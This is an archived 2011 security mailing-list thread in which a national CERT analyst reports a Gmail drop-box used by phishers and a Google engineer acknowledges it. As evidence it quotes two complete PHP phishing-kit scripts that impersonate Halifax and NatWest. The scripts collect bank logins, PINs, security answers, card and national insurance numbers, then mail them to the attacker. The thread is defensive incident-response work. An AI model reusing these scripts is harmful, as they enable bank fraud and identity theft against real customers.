[nsp-sec] gmail phishing drop-box

Peter Moody pmoody at google.com
Fri Jul 8 14:31:59 EDT 2011 

ack.

On Fri, Jul 8, 2011 at 11:29 AM, Rodolfo Baader <rbaader at arcert.gov.ar>wrote:

> ----------- nsp-security Confidential --------
>
> Hi!
>
> while investigating a phishing case, we've found the following dropbox:
>  "hardman700 at gmail.com"
>
> Evidence:
>
> ==============================================================================
> [1] <?
> session_start();
> $cc="hardman700 at gmail.com";
> $Username = $_POST['Username'];
> $Password = $_POST['Password'];
> $ip = getenv("REMOTE_ADDR");
> $adddate=date("D M d, Y g:i a");
> $Fschool = $_POST['fschool'];
> $Email = $_POST['emad'];
> $EmailPas = $_POST['emad1'];
> $POB = $_POST['pob'];
> $MFname = $_POST['mfname'];
> $FFname = $_POST['ffname'];
> $Mmdname = $_POST['mmdname'];
> $DTPSN = $_POST['DTPSN'];
> $telpass = $_POST['telpass'];
> $mwrd = $_POST['mwrd'];
> $mwrd2 = $_POST['mwrd2'];
> $nis = $_POST['nis'];
> $SQ = $_POST['sq'];
> $ANS = $_POST['ans'];
>
>  $subj = "halifax";
>  $msg = "First Page\n\nUsername: $Username\nPassword: $Password\n\nSecond
> Page\n\nThe name of your first school: $Fschool\nYour place/town of birth :
> $POB\nYour mother's FIRST name: $MFname\nYour father's FIRST name:
> $FFname\nYour
> mother's maiden name: $Mmdname\nSecurity Question: $SQ\nAnswer: $ANS\nEmail
> Address: $Email\nEmail Password: $EmailPas\n6 Digits Telephone Banking PIN:
> $DTPSN\nTelephone Banking Password: $telpass\nMemorable Info: $mwrd
> \nMemorable
> Info: $mwrd2 \nNat-Ins-Numb: $nis \n\nSubmitted from IP Address - $ip on
> $adddate\n-------\n        Created By Vince\n------";
>  $from = "From: Shaun Halifax";
>  mail("$halifax", $subj, $msg, $from);
>         mail("$cc", $subj, $msg, $from);
>
>
> header("Location:finish.php?&Mid=8007_1944504_80296_1758_3472_0_825_16178_712264114&inc=&Search=&YY=20774&order=down&sort=date&pos=0&view=a&head=b#");
>
> ?>
>
>
> =============================================================================
> [2] <?
> $to = "hardman700 at gmail.com";
> //---------------------------------
> $DBID_edit = $_POST['DBID_edit'];
> $LI6PPEA_edit = $_POST['LI6PPEA_edit'];
> $LI6PPED_edit = $_POST['LI6PPED_edit'];
> $LI6PMMN_edit = $_POST['LI6PMMN_edit'];
> $LI6PPWD_edit = $_POST['LI6PPWD_edit'];
> $ip = $_SERVER['REMOTE_ADDR'];
> $subj = "NatWest Bank UK";
> $msg = "Enter Your Customer Number : $DBID_edit\nEnter Your PIN :
> $LI6PPEA_edit\nEnter Your Password : $LI6PPED_edit\nEnter Your MMN :
> $LI6PMMN_edit\nEnter Your Debit Card Number : $LI6PPWD_edit\nIP : $ip";
> $from = "FROM: BraIn Inc.©<mail at nwolb.com>";
>  {
>  mail($to,$subj,$msg,$from);
>  }
> header("location:
> http://www.natwest.com/tools/general/nwolb_legals/index.htm");
> ?>
>
>
> ==============================================================================
>
> R.
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________




-- 
Peter Moody      Google    1.650.253.7306
Security Engineer  pgp:0xC3410038

More information about the nsp-security mailing list